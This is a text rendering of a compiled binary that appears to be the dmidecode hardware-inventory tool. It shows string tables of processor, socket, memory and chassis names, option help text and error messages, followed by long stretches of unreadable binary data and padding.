Add-on Card Fast-paged Static Column Pseudo-static RAMBus CMOS Window DRAM Cache DRAM Non-Volatile Registered (Buffered) Unbuffered (Unregistered) LRDIMM NVDIMM-N NVDIMM-F NVDIMM-P Volatile memory Bus Mouse DB-9 Bus Mouse Micro DIN SPI HIP-HIL Bus Mouse ADB (Apple Desktop Bus) Active Cooling Passive Cooling Centrifugal Blower Chip Fan Cabinet Fan Power Supply Fan Heat Pipe Integrated Refrigeration 8250 UART Register Compatible Byte Checksum CRC Checksum Negative Word Checksum Absent Stand-by Offline Stand-by Spare Unavailable Offline Video SCSI Controller Ethernet Token Ring Sound PATA Controller SATA Controller SAS Controller Wireless LAN WWAN eMMC NVMe Controller UFS Controller Manual Auto-switch Wide Range Linear UPS Converter Regulator Non-critical Successive Byte Boundaries 32-bit Boundaries 16-byte Boundaries KCS (Keyboard Control Style) BT (Block Transfer) SSIF (SMBus System Interface) RamBus SyncLink I/O Port SMBus LM75 LM78 LM79 LM80 LM81 ADM9240 DS1780 MAX1617 GL518SM W83781D HT82H791 No errors detected No bootable media User-requested boot System security violation Previously-requested image System watchdog timer expired Peripheral Bay System Management Module Processor Module Power Unit Add-in Card Front Panel Board Back Panel Board Power System Board Drive Back Plane Non-recoverable Not Implemented Operating System System Utilities Do Not Reboot Lead Acid Nickel Cadmium Nickel Metal Hydride Lithium Ion Zinc Air Lithium Polymer Track Ball Track Point Glide Point Touch Pad Touch Screen Optical Sensor Partial Write Device Level Memory Partition Level Bad Read Parity Error Double-bit Error Multi-bit Error Nibble Error Checksum Error CRC Error Corrected Single-bit Error Corrected Error Uncorrectable Error EDRAM VRAM SRAM Flash EEPROM FEPROM CDRAM 3DRAM SGRAM RDRAM DDR2 FB-DIMM FBD2 LPDDR LPDDR2 LPDDR3 LPDDR4 Logical non-volatile device HBM HBM2 LPDDR5 HBM3 SIP DIP ZIP Proprietary Card TSOP Row Of Chips SODIMM SRIMM Die Single-bit ECC Multi-bit ECC CRC System Memory Video Memory Flash Memory Non-volatile RAM Cache Memory No Header Type 1 Not applicable Full height Low-profile 2.5&quot; drive form factor 3.5&quot; drive form factor Unavailable 16 bit 32 bit 64 bit 128 bit 1x or x1 2x or x2 4x or x4 8x or x8 12x or x12 16x or x16 32x or x32 Direct Mapped Fully Associative 16-way Set-associative 12-way Set-associative 24-way Set-associative 32-way Set-associative 48-way Set-associative 64-way Set-associative 20-way Set-associative Instruction Unified External Write Through Write Back Varies With Memory Address One-way Interleave Two-way Interleave Four-way Interleave Eight-way Interleave Sixteen-way Interleave 8-bit Parity 32-bit ECC 64-bit ECC 128-bit ECC Daughter Board ZIF Socket Replaceable Piggy Back LIF Socket Slot 1 Slot 2 370-pin Socket Slot A Slot M Socket 423 Socket A (Socket 462) Socket 478 Socket 754 Socket 940 Socket 939 Socket mPGA604 Socket LGA771 Socket LGA775 Socket S1 Socket AM2 Socket F (1207) Socket LGA1366 Socket G34 Socket AM3 Socket C32 Socket LGA1156 Socket LGA1567 Socket PGA988A Socket BGA1288 Socket rPGA988B Socket BGA1023 Socket BGA1224 Socket BGA1155 Socket LGA1356 Socket LGA2011 Socket FS1 Socket FS2 Socket FM1 Socket FM2 Socket LGA2011-3 Socket LGA1356-3 Socket LGA1150 Socket BGA1168 Socket BGA1234 Socket BGA1364 Socket AM4 Socket LGA1151 Socket BGA1356 Socket BGA1440 Socket BGA1515 Socket LGA3647-1 Socket SP3 Socket SP3r2 Socket LGA2066 Socket BGA1392 Socket BGA1510 Socket BGA1528 Socket LGA4189 Socket LGA1200 Socket LGA4677 Socket LGA1700 Socket BGA1744 Socket BGA1781 Socket BGA1211 Socket BGA2422 Socket LGA1211 Socket LGA2422 Socket LGA5773 Socket BGA5773 Socket AM5 Socket SP5 Socket SP6 Socket BGA883 Socket BGA1190 Socket BGA4129 Socket LGA4710 Socket LGA7529 Socket BGA1964 Socket BGA1792 Socket BGA2049 Socket BGA2551 Socket LGA1851 Socket BGA2114 Socket BGA2833 Disabled by user Disabled by firmware Idle Central Processor Math Processor DSP Processor Video Processor External Interface Locked Out External Interface Enabled Safe Server Blade Connectivity Switch Processor+Memory Module Processor+I/O Module Interconnect Board APM Timer Modem Ring LAN Remote Power Switch PCI PME# AC Power Restored Low Profile Desktop Pizza Box Mini Tower Portable Laptop Hand Held Docking Station All In One Sub Notebook Space-saving Lunch Box Main Server Chassis Sub Chassis Bus Expansion Chassis Peripheral Chassis RAID Chassis Rack Mount Chassis Sealed-case PC Multi-system CompactPCI AdvancedTCA Blade Enclosing Tablet Convertible Detachable IoT Gateway Embedded PC Mini PC Stick PC Single-bit Error Correcting Double-bit Error Correcting Error Scrubbing 5.0 V 3.3 V 2.9 V 8086 80286 80386 80486 8087 80287 80387 80487 Pentium Pentium II Pentium MMX Pentium II Xeon Pentium III Celeron M Pentium 4 HT Duron K5 K6 K6-2 K6-3 Athlon AMD29000 K6-2+ Power PC Power PC 601 Power PC 603 Power PC 603+ Power PC 604 Power PC 620 Power PC x704 Power PC 750 Core Duo Core Duo Mobile Core Solo Mobile Atom Core m3 Core m5 Core m7 Alpha Alpha 21064 Alpha 21066 Alpha 21164 Alpha 21164PC Alpha 21164a Alpha 21264 Alpha 21364 Turion II Dual-Core Mobile M Athlon II Dual-Core M Opteron 6100 Opteron 4100 Opteron 6200 Opteron 4200 MIPS MIPS R4000 MIPS R4200 MIPS R4400 MIPS R4600 MIPS R10000 C-Series E-Series G-Series Z-Series R-Series Opteron 4300 Opteron 6300 Opteron 3300 FirePro SuperSPARC MicroSPARC II MicroSPARC IIep UltraSPARC UltraSPARC II UltraSPARC IIi UltraSPARC III UltraSPARC IIIi 68040 68xxx 68000 68010 68020 68030 Athlon X4 Opteron X1000 Opteron X2000 Opteron A-Series Opteron X3000 Zen Hobbit Crusoe TM5000 Crusoe TM3000 Efficeon TM8000 Weitek Itanium Athlon 64 Sempron Turion 64 Dual-Core Opteron Athlon 64 X2 Turion 64 X2 Quad-Core Opteron Third-Generation Opteron Phenom FX Phenom X4 Phenom X2 Athlon X2 PA-RISC PA-RISC 8500 PA-RISC 8000 PA-RISC 7300LC PA-RISC 7200 PA-RISC 7100LC PA-RISC 7100 V30 Quad-Core Xeon 3200 Dual-Core Xeon 3000 Quad-Core Xeon 5300 Dual-Core Xeon 5100 Dual-Core Xeon 5000 Dual-Core Xeon LV Dual-Core Xeon ULV Dual-Core Xeon 7100 Quad-Core Xeon 5400 Quad-Core Xeon Dual-Core Xeon 5200 Dual-Core Xeon 7200 Quad-Core Xeon 7300 Quad-Core Xeon 7400 Multi-Core Xeon 7400 Pentium III Xeon Pentium III Speedstep Pentium 4 AS400 Xeon MP Athlon XP Athlon MP Itanium 2 Pentium M Celeron D Pentium D Pentium EE Core Solo Core 2 Duo Core 2 Solo Core 2 Extreme Core 2 Quad Core 2 Extreme Mobile Core 2 Duo Mobile Core 2 Solo Mobile Core i7 Dual-Core Celeron IBM390 G4 G5 ESA/390 G6 z/Architecture Core i5 Core i3 Core i9 Xeon D C7-M C7-D C7 Eden Multi-Core Xeon Dual-Core Xeon 3xxx Quad-Core Xeon 3xxx Nano Dual-Core Xeon 5xxx Quad-Core Xeon 5xxx Dual-Core Xeon 7xxx Quad-Core Xeon 7xxx Multi-Core Xeon 7xxx Multi-Core Xeon 3400 Opteron 3000 Sempron II Embedded Opteron Quad-Core Phenom Triple-Core Turion Ultra Dual-Core Mobile Turion Dual-Core Mobile Athlon Dual-Core Sempron SI Phenom II Athlon II Six-Core Opteron Sempron M i860 i960 ARMv7 ARMv8 ARMv9 SH-3 SH-4 StrongARM 6x86 MediaGX MII WinChip DSP RV32 RV64 RV128 LoongArch Loongson 1 Loongson 2 Loongson 3 Loongson 2K Loongson 3A Loongson 3B Loongson 3C Loongson 3D Loongson 3E Dual-Core Loongson 2K 2xxx Quad-Core Loongson 3A 5xxx Multi-Core Loongson 3A 5xxx Quad-Core Loongson 3B 5xxx Multi-Core Loongson 3B 5xxx Multi-Core Loongson 3C 5xxx Multi-Core Loongson 3D 5xxx Core 3 Core 5 Core 7 Core 9 Core Ultra 3 Core Ultra 5 Core Ultra 7 Core Ultra 9 PiB EiB ZiB       %02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x    %02x%02x%02x%02x-%02x%02x-%02x%02x-%02x%02x-%02x%02x%02x%02x%02x%02x
   PCI device %02x:%02x.%x, MAC address %02X:%02X:%02X:%02X:%02X:%02X      Only one string can be specified
       Invalid OEM string number: %s
  Type number or keyword expected
        Options --string, --type, --handle and --dump-bin are mutually exclusive
       Options --from-dump and --dump-bin are mutually exclusive
      SMBIOS implementations newer than version %u.%u.%u are not      fully supported by this version of dmidecode.   %u structures occupying %u bytes.       Wrong DMI structures length: %u bytes announced, only %lu bytes available.
     BIOS iSCSI NIC PCI and MAC Information  BIOS PXE NIC PCI and MAC Information    %s ProLiant Super IO Enable/Disable Indicator   %s Processor Specific Information       %s ProLiant CPU Microcode Patch Support Info    %s ProLiant System/Rack Locator %s Trusted Module (TPM or TCM) Status   %s BIOS PXE NIC PCI and MAC Information %s HDD Backplane FRU Information        %s ProLiant USB Port Connector Correlation Record       %s USB Device Correlation Record        %s ProLiant Hard Drive Inventory Record %s ProLiant Extension Board Inventory Record    FPU (Floating-point unit on-chip)       Invalid entry length (%u). DMI table is broken! Stop.

 Handle 0x%04X, DMI type %d, %d bytes
   Invalid entry length (%u). Fixed up to %u.
     Firmware characteristics not supported  Embedded Controller Firmware Revision   %02X %02X %02X %02X %02X %02X %02X %02X Enabled Error Correcting Capabilities   On Board Device %d Information  Supported Log Type Descriptors  Memory Operating Mode Capability        Memory Subsystem Controller Manufacturer ID     Memory Subsystem Controller Product ID  32-bit Memory Error Information Memory Array Mapped Address Handle      Boot Integrity Services Entry Point     64-bit Memory Error Information Management Device Threshold Data        Lower Non-recoverable Threshold Upper Non-recoverable Threshold Management Controller Host Interface    Credential bootstrapping via IPMI is supported  Credential Bootstrapping Handle Total read length %d exceeds total structure length %d (handle 0x%04hx)
        Total read length %d exceeds total structure length %d (handle 0x%04hx, record %d)
     Redfish Service IP Discovery Type       Redfish Service IP Address Format       TPM Device characteristics not supported        Family configurable via firmware update Family configurable via platform software support       Family configurable via OEM proprietary mechanism       Firmware Inventory Information  Lowest Supported Firmware Version       Function bitmap for Communication Button        Function bitmap for Application Button  Function bitmap for Media Button        Function bitmap for Display Button      Function bitmap for Others Button       Communication Function Key Number       Scancode 0x%04hx -&gt; Keycode 0x%04hx     0x%04hx (location 0x%02hhx, AND mask 0x%02hhx, OR mask 0x%02hhx)        Supported Command Classes Bitmap        0x%04hx (location 0x%04hx, value 0x%04hx)       ThinkPad Device Presence Detection      ThinkPad Embedded Controller Program    Wrong DMI structures count: %d announced, only %d decoded.
     Wrong DMI structures length: %u bytes announced, structures occupy %lu bytes.
  Entry point length too large (%u bytes, expected %u).
  SMBIOS version fixup (2.%d -&gt; 2.%d).
   Usage: dmidecode [OPTIONS]
Options are:
 -d, --dev-mem FILE     Read memory from device FILE (default: /dev/mem)
 -h, --help             Display this help text and exit
 -q, --quiet            Less verbose output
     --no-quirks        Decode everything without quirks
 -s, --string KEYWORD   Only display the value of the given DMI string
     --list-strings     List available string keywords and exit
 -t, --type TYPE        Only display the entries of given type
     --list-types       List available type keywords and exit
 -H, --handle HANDLE    Only display the entry of given handle
 -u, --dump             Do not decode the entries
     --dump-bin FILE    Dump the DMI data to a binary file
     --from-dump FILE   Read the DMI data from a binary file
     --no-sysfs         Do not attempt to read DMI data from sysfs files
     --oem-string N     Only display the value of the given OEM string
 -V, --version          Display the version and exit Reading SMBIOS/DMI data from file %s.   /sys/firmware/dmi/tables/smbios_entry_point     Getting SMBIOS data from sysfs. Failed to get SMBIOS data from sysfs.   %s: SMBIOS entry point missing
 Found SMBIOS entry point in EFI, reading table from %s. No SMBIOS nor DMI entry point found, sorry.     Smart Array Storage Controller  Dynamic Smart Array Controller  Internal Virtual USB (Embedded NAND)    Power Management Controller Firmware    Power Management Controller Firmware Bootloader SL Chassis Firmware Bootloader  Compatibility Support Module (CSM)      Smart Storage Battery (Megacell) Firmware       Trusted Module (TPM or TCM) Firmware Version    Innovation Engine Firmware (IE Firmware)        EL Chassis Abstraction Revision EL Cartride Abstraction Revision        PCIe Riser Programmable Logic Device    PCIe cards that contain a CPLD  Secondary System Programmable Logic Device      Intel Artic Sound -M Accelerator Models Firmware        Ampere System Control Processor (SCP - PMPro+SMPro)     Boot from PC Card (PCMCIA) is supported Japanese floppy for NEC 9800 1.2 MB is supported (int 13h)      Japanese floppy for Toshiba 1.2 MB is supported (int 13h)       5.25&quot;/360 kB floppy services are supported (int 13h)    5.25&quot;/1.2 MB floppy services are supported (int 13h)    3.5&quot;/720 kB floppy services are supported (int 13h)     3.5&quot;/2.88 MB floppy services are supported (int 13h)    Print screen service is supported (int 5h)      8042 keyboard services are supported (int 9h)   Serial services are supported (int 14h) Printer services are supported (int 17h)        CGA/mono video services are supported (int 10h) ATAPI Zip drive boot is supported       BIOS boot specification is supported    Function key-initiated network boot is supported        Targeted content distribution is supported      Manufacturing mode is supported Board requires at least one daughter board      MSR (Model specific registers)  PAE (Physical address extension)        CX8 (CMPXCHG8 instruction supported)    APIC (On-chip APIC hardware supported)  MTRR (Memory type range registers)      MCA (Machine check architecture)        CMOV (Conditional move instruction supported)   PSE-36 (36-bit page size extension)     PSN (Processor serial number present and enabled)       CLFSH (CLFLUSH instruction supported)   MMX (MMX technology supported)  FXSR (FXSAVE and FXSTOR instructions supported) SSE (Streaming SIMD extensions) SSE2 (Streaming SIMD extensions 2)      TM (Thermal monitor supported)  Correctable and Uncorrectable Errors    9 Pin Dual Inline (pin 10 cut)  25 Pin Dual Inline (pin 26 cut) On Board Sound Input From CD-ROM        Parallel Port XT/AT Compatible  MFDP (Multi-Function Display Port)      PCI Express Mini 52-pin with bottom-side keep-outs      PCI Express Mini 52-pin without bottom-side keep-outs   OCP NIC 3.0 Small Form Factor (SFF)     OCP NIC 3.0 Large Form Factor (LFF)     Correctable memory log disabled Asynchronous hardware timer expired     System configuration information        Uncorrectable CPU-complex error Multiple-event system management        Intel Optane DC persistent memory       Byte-accessible persistent memory       Block-accessible persistent memory      KCS: Keyboard Controller Style  16450 UART Register Compatible  16550/16550A UART Register Compatible   16650/16650A UART Register Compatible   16750/16750A UART Register Compatible   16850/16850A UART Register Compatible   SMIC (Server Management Interface Chip) Operating system failed to load Firmware-detected hardware failure      Operating system-detected hardware failure      Indexed I/O, one 8-bit index port, one 8-bit data port  Indexed I/O, two 8-bit index ports, one 8-bit data port Indexed I/O, one 16-bit index port, one 8-bit data port Memory-mapped physical 32-bit address   General-purpose non-volatile data functions     Turion II Ultra Dual-Core Mobile M  ����4���4���h���4���4���4���N���4������4���4���4���Ȥ��4���4�������4���s���4���g����4�����4���4���4���4���4���4���4���4���4���4���4���4���4���ӣ��4���4���4���ǣ��4���4���4���4���4���4���4���4���Ӣ��4���i�����ߢ��H���x�������������������ȸ��������������X������������������������������������������������������������� ������������������������������������������������8���������������h������������������p������(�������������������q�����f�����������o��(��
��T��.��.����������������������������������������$�����������,��������{����������������{ ��������t������&quot;���#���$���%���&amp;��P)���*��O+���,��c/���0��&lt;3���5��]6���6��_7��G��&lt;������M���� ��l!��������$���$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�$�4�����	������
)� � �   A  zD  �B%s: Unexpected end of file
 malloc lseek munmap Can&#039;t read memory from %s
 Processor Identity 0x%08x
 wb fdopen Writing %d bytes to %s. fwrite fseek fclose PME signal is supported SMBus signal is supported Flexbus slot, CXL 1.0 capable Flexbus slot, CXL 2.0 capable Flexbus slot, CXL 3.0 capable 5.0 V is provided 3.3 V is provided Opening is shared PC Card-16 is supported Cardbus is supported Zoom Video is supported  %s: Can&#039;t read data beyond EOF
 mmap: Can&#039;t map beyond end of file %s
  Type %u, Family %u, Major Stepping %u, Minor Stepping %u        Type %u, Family %u, Model %u, Stepping %u       Implementor 0x%02x, Variant 0x%x, Architecture %u, Part 0x%03x, Revision %u     JEP-106 Bank 0x%02x Manufacturer 0x%02x, SoC ID 0x%04x, SoC Revision 0x%08x     Family %u, Model %u, Stepping %u        Hot-plug devices are supported  PCIe slot bifurcation is supported      Async/surprise removal is supported     Modem ring resume is supported  0j���h���h��i��hi���i���i���h��;�  1   �w���  �z���  x}���
  (����  ���  H���   ����8  ؇���  ����   X���@  ����T  ����  �����  �����  ����  ����8  ����  �����  �����  H����  ����  ����  ����,  ����X  �����  ���  ؘ���  �����  8���L  (���p  ����  ����  �����  ����H  (����  (��	  8\���	  ^��
  �`��X
  Hb���
  c��D  �d���  Xg���  Hh���  j��  k��p  (m���  �m��  �o��              zR x�        p���&amp;    D    $   4   v���   FJw� ?:*3$&quot;       \   �x���             t   ���-    Dh    �    ���=    Th P  �   H���I   B�K�N �H(�A0�A8�D`E
8C0A(B BBBF�hBpBxA�A�B�H�K�E�E�E�L�I`D
8A0A(B BBBCGhIpBxA�A�B�E�H�E�E�E�E�I`D
8A0A(B BBBAK
8A0A(B BBBEKhBpBxA�A�B�E�H�E�E�E�E�W`DhBpBxA�A�B�H�K�E�E�E�E�   p   �  D����   B�B�A �A(�G0�
(A ABBCJ
(H ABBI�
(H ABBG\
(H ABBG &lt;   l  �����   B�I�A �D(�I�
(A ABBJ      �  ���E       (   �  L���g    B�R�O �@AB  (   �  ����g    B�R�O �@AB  H     Ԉ��   DW
U\
Du
KB
N]
K`
HR
NO
Qc      d  �����    F�M��
BA   �  t���   D0
Ex   �  x���W   B�B�B �E(�A0�A8�D`�
8A0A(B BBBJX
8J0A(B BBBEl
8H0A(F BBBO       \���~          4  ȍ��^          H  ���J          \  P���2          p  |���)          �  ����&gt;       (   �  Ď���   A�D�DP|
AAI L   �  8���   B�E�D �D(�F@fHUPSXE`EhEpK@T
(A ABBI     ����5           (  $����    F�M��
BA   L  ��    G��
AL   h  ����u   B�G�I �I(�D0�K8�G�D
8D0A(B BBBA       �  ���    F�J��
BA@   �  �����   B�E�E �D(�C0�G@�
0D(A BBBG        L����    F�M��
BA    D  (����    F�J��
BAH   h  ��   B�I�I �B(�A0�A8�Dp!
8A0A(B BBBI4   �  X���{    Z�K�H �G(�F0z(A ABB �   �  �����0   B�B�B �I(�A0�D8�Dp�
8A0A(B BBBI�x`�HxAp�xE�HxApgxE�HxBp�xE�E�E�Kp   �   x  ���   B�E�B �E(�A0�A8�K�D
8A0A(B BBBG@
8H0A(B BBBE��X�W�A��B�G�G�G�K�t�H�U�A���E�I�B���E�V�C�8   &lt;  `R���   B�B�A �C(�D�}
(D ABBF H   x  T���   B�B�B �B(�D0�A8�D�}
8D0A(B BBBE @   �  hV��u   B�I�B �A(�E0�Gp�
0A(A BBBC P   	  �r���   F�B�B �B(�D0�D8�D�Y
8D0A(B BBBA       P   \	  PW���    K�E�E �D(�D0�V
(A BBBFy(F BBBA�����  @   �	  �W���   F�H�E �A(�A0�L��
0D(A BBBHH   �	  Y���   F�G�H �E(�A0�A8�G��
8D0A(B BBBF   @
  |[���    K��
A   \
  P\���   �V f `   x
  ^���    R�E�E �D(�A0��(A BBBH�����X0�����A�(H� D�I�B�   `   �
  �^��   F�L�L �D(�A0��
(A BBBHn
(D BBBEi
(A BBBE  4   @  L`���    J�E�C �q
ABJCAB     x  �`��         �  �b��    Q                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    @�       �      `B                             �     ��     ��     ��     
�     �     %�          8�     F�     W�     `�     p�     {�     (     ��     ��     ��     ��             �     ��     ��     ��     ��     ��     �     H     �     )�     &gt;�     G�     ��     (     R�     V�     e�     v�     ��     ��     ��     ��                     ��     ��     ��     ��     p     �     ��     �     ��     �     �     �     3�          @     8�     P�     i�     p     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     �     ��     ��     �     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     �          ��     �     �     0     *�     `     �     C�     Y�     c�     o�     ��     ��     ��     ��     ��     �     ��     �     �     ��     �     /�                     �     9�     ��     ��     �     G�     O�     W�     �     f�     j�     ��     �     y�     ��     ��     ġ     ��     ��     ��     ��     �     &quot;�             ��     3�     &lt;�     @�     6�     :�     �     D�     P�     Y�     i�     x�     ��     ��     ��     ��     ��     ��     ��     ��     ��                             ��     �     !�     4�     H�     f�     j�     ڣ     p�     ڣ     x�     t�     {�                             F�     ��     ��     ��     ��                             ��     ��     ��     ��     ��     ��                     g�     ��     l�     ��     ��     �     �     �     �     �     %�     3�     B�                             ��     ��     P�     a�     |�     r�     ��     ��     ��     ��                     ��     ��     ��     ��     ��     ��                     Ӡ            ��            ��            �            �            &amp;�           :�           N�           ]�           r�           ~�           ��           ��           ��           ��           ��           ��           
�           �           ,�           &lt;�           R�           d�           u�           ��           ��           ��     U$     �     O$     ��     K$     ��     I$     ��     G$     _�     B$     ��     @$     ��     &gt;$     ��     &lt;$                     R�     º     7�     7�     H     ��     ��     ��     �     �     5�     F�     W�     o�     ��     ��     ��     ��     ��     �     �     �     8     x     �     �           X     �     �     �          �                             #�     5�     M�     ^�     t�     @     ��     ��     h     �     �     ��     ��     �     ��             �          )�     &lt;�     Q�                             �     h�     ��     ��     ��     H     h     ��     �     �             ��     �     �          0     �     `     �     �             :�     K�     �          8     X     a�     q�     �             ��     ��     ��     ��     ��     ��     ��     �     &quot;�     �     �     ��     /�     &gt;�     �     �     3�     ��     8�     B�             &quot;�     H�     ]�     �     �     �     p�     ��     z�     ��     ��             �     ��     ��     ��     ��                             ġ     ��     ��     ��     ��     ��      �     �     �     &quot;�     .�     4�     :�     J�     �     ��     S�     \�     c�     t�     }�     ��     ��     ��     �     �     ��     ��          ��     �     �     1�     5�     ?�     X�     n�     ~�                     ġ     0     ��     ��     ��     ��     ��     ��     �     7�     U�     _�     i�     w�     ��     t�     ��     ��     ��     ��     ��     ��     ��     ��     ��     �     ��     ��     ��     �     �     �     ��     ��     P     +�     7�     A�     K�     S�     c�     n�     z�     ��     ��     ��     ��     ��     ��     ��     ��     �     �     *�     8�     I�     Z�     k�     |�     7�     ��     ��     ��     ��     ��     ��     ��      �     �     &quot;�     3�     D�     V�     e�     n�             �     �     |�     w�     {�     �     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     �     �     $�     1�     &lt;�     H�     U�     e�     q�     ��     ��     ��     x     �     ��     ��     ��     �          �     0�     ��     B�     ��     l�     M�     ��     ��     _�     n�     {�     ��     ��     ��     F�     k�     .�     ��     ��     �     ��     ��      �     ۽     N�     ɾ     �     d�     ̿     �     �     ��     ��     ��     �     �     8     ��     ��     ��     ��     ��     �     �     l�     �     �             N�     �     #�     ��             ,�     H�     c�     w�     ��     ��     ��     ��     ��     ��     ��     ��     8     
�             �     X     �     1�     G�     �     [�     r�     ġ     ��     ~�     ��     ��     ��     �             ��     ��     ��     	�     %�                             �     �     5�     R�     Q�     b�     r�     ��     ��     ��                     �     �     ��     ��     ��     ��     ��     ��     &gt;�     ��     ��     ��     �     �     4�             �     �     ��     ;�     D�     M�     �             �     �     V�          @                             f�     u�     ��     8�     ��                             �     �     �     ��     S�     ��     ��     ��     ��     ��                     �     �     ��     ��     ��     ��     ��     �     �                             h     2�     �     �     �     �                   t�     P�     ^�     k�     �     �     &gt;�     ̴     ��     ��     ��     ��     �     �     ��     ��     ��     ��     ��     ��     ��     �     �     ��     )�     .�     3�     C�     �     �     R�     Y�     e�     P�                     �     �     p�     ;�     )�     w�     {�     ��     �     �     &quot;�     ��     -�                             ��     ��     ��     7�     �     ��     H     ��     �                             �     �     +�     2�     �     �     ;�     K�     D�                             �     �     J�     O�     T�     Y�     ^�     c�     k�     r�     z�     ��     ��                             ��     ��     p     �     �     ��     ��     ��     �                             �     �     l�     [�     �     .�     E�     ��     G�     X�     c�     o�     ��     ��     ��             �     �     &quot;�     ��     -�     ��                     �     �     l�     [�     �     .�     E�     ��     G�     X�     c�             &gt;�     ̴     ��     �     7�     ��     ��     ��     �     �     �     �     �     4�     @�     I�     �     �     ��     Y�     d�     p�     |�     ��     ��                             �     �     ��     ��     ��                             �     �     ��     ��     �     �     &quot;�     ��     ��     ;�     ��     ��     �     �     &#039;�     1�     L�     \�                     �     �     ��     p�     v�     {�     ��     ��     ��     ��     ��     ��     ��     ��     B�     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��      �     ��     �     �     �     3�     
�     ��     �     �     �     ��     &#039;�     ,�     A�     9�     @�     ��     F�     �     �     ġ     �     J�     Y�     g�             �     �     k�     y�     ��     ��     ��             ��     ��                     �           X     �     �                             ��     �     �     ��     ��                             �     �     &lt;�     K�     ��      �                     �     �     ��     ��     �                             �     �     :�     #�     *�     1�     8�     @�     I�     R�     [�     d�     o�     z�                     �     �     ��     ��     ��     ��     �     ��     ��     ��     ��     �     �     /�                     �     �     F�     i�     R�                             �     �     ġ     �     J�     Y�                     P�     Z�     7�     �     c�     q�     |�     �     �     �     ��     ��     ��     ��     ��             �     �     ġ     ��     
�     �      �     g�     �     �     ,�     ;�     F�     ġ     ]�     h�     o�     v�     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     ��     �     �      �     0�     ?�     J�     U�     `�     o�     ~�     ��     ��     ��     ��     ��     ��     ��     ��     �     �     �     #�     4�     E�     T�     c�     r�     ��     ��     ��     ��     ��     ��     ��     ��     ��      �     �     �     -�     &lt;�     K�     Z�     i�     x�     ��     ��     ��     ��     ��     ��     ��     ��     ��     �     �     �     .�     =�     L�     [�     j�     y�     ��     ��     ��             �     ̴     ��     ��     ��     7�     7�     �     �     �     ��     ��     �     �                     �     �     ġ     �     =�                             �     �     X�     %�     -�     ��     ��     ��     �     �     ]�     j�     .�     G�     ��     ��     ,�     E�     ~�     ��     ��                             ��     �     �     ��     ��     ��     ��     ��     ��                             �     �     �     �     �     $�     )�     /�     8�     h�     ?�     I�     Y�     d�     q�     ~�     ��     ��     ��     ��     ��     ��     ��     ��      �     �     �     d�     $�     4�     ;�     G�     R�     ^�     j�     r�     �     �     ġ     {�     ��     ��     ��     ��     ��                                    �            �            ��            ��            ��            ��            ��            ��     	       ��     
       ��            �            +�            �            �            �            &quot;�            2�            �            �            &gt;�            H�            Y�            U�            [�            ^�            a�            f�            k�            r�            {�             ��     !       ��     &quot;       ��     #       ��     $       ��     %       ��     &amp;       �     &#039;       �     (       �     )       �     *        �     +       �     ,       ��     -       �     .       �     /       &amp;�     0       .�     1       4�     2       @�     3       L�     4       X�     5       f�     6       s�     7       �     8       �     9       ��     :       ��     ;       ��     &lt;       �     =       �     &gt;       �     ?       $�     @       �     A       ��     B       �     C       �     D       �     E       #�     F       /�     G       8�     H       M�     I       A�     J       J�     K       S�     L       \�     M       i�     N       v�     O       ��     P       ��     Q       ��     R       ��     S       ��     T       ��     U       ��     V       �     W       �     X       �     `       ��     a       �     b       �     c       �     d       �     e       �     f       �     g       )�     h       7�     i       E�     j       V�     k       d�     p       h�     x       o�     y       }�     z       ��     �       ��     �       ��     �       ��     �       ��     �       ��     �       ��     �       �     �       �     �       �     �       �     �       �     �       �     �       &#039;�     �       1�     �       ;�     �       E�     �       M�     �       Z�     �       g�     �       v�     �       ��     �       ��     �       ��     �       ��     �       ��     �       �     �       �     �       �     �       �     �       �     �       ,�     �       @�     �       T�     �       c�     �       w�     �       ��     �       ��     �       ��     �       �     �       �     �       �     �       -�     �       ��     �       ��     �       �     �       �     �       �     �       %�     �       /�     �       9�     �       C�     �       N�     �       X�     �       c�     �       o�     �       ~�     �       ��     �       ��     �       ��     �       �     �       �     �       �     �       �     �       �     �       �     �       ��     �       �     �       �     �       �     �       �     �       %�     �       *�     �       /�     �       2�     �       7�     �       G�     �       [�     �       o�     �       t�     �       ��     �       ��     �       ��     �       �     �       �     �       �     �       ��     �       �     �       !�     �       4�     �       R�     �       j�     �       {�     �       ��     �       ��     �       ��     �       ��     �       ��     �       ��            ��           �           �           �           �           �           �           �     ,      �     -      �     .      �     @      ��     ^      ��     �      �            �           �           �     X      �     Y      �     Z      &#039;�     [      2�     \      =�     ]      I�     ^      U�     _      a�     `      m�     a      y�     b      ��     l      ��     m      ��     n      �     o      �     p      �     q      *�            F�           M�           T�           [�           b�           o�           |�           ��                     g�     �     R�     º     ʺ     ��     ��     ��      %     �&#039;     %     �&#039;     �&#039;     2%     P%     n%     �%     �%     �%     �%     �%     �%     �&#039;            �              �             (�            PB                          XB                   ���o    �             �             �      
       :                                          H~                                        �             �             �      	                             ���o          ���o    �      ���o           �o          ���o    �                                                                                      X|                     0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      Р      �      �       �      �       �      0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      С      �      �       �      �       �      0�      @�      P�      `�      p�      ��      ��      ��      ��      ��      Т      �                                                                                                      Ƣ                    d       ΢                     h       Ӣ                     q       ٢                     Q       ��                    s       &#039;�                    t       �                     u       �                    B       �                    F       ��                    H       ��                    O       �                     S       
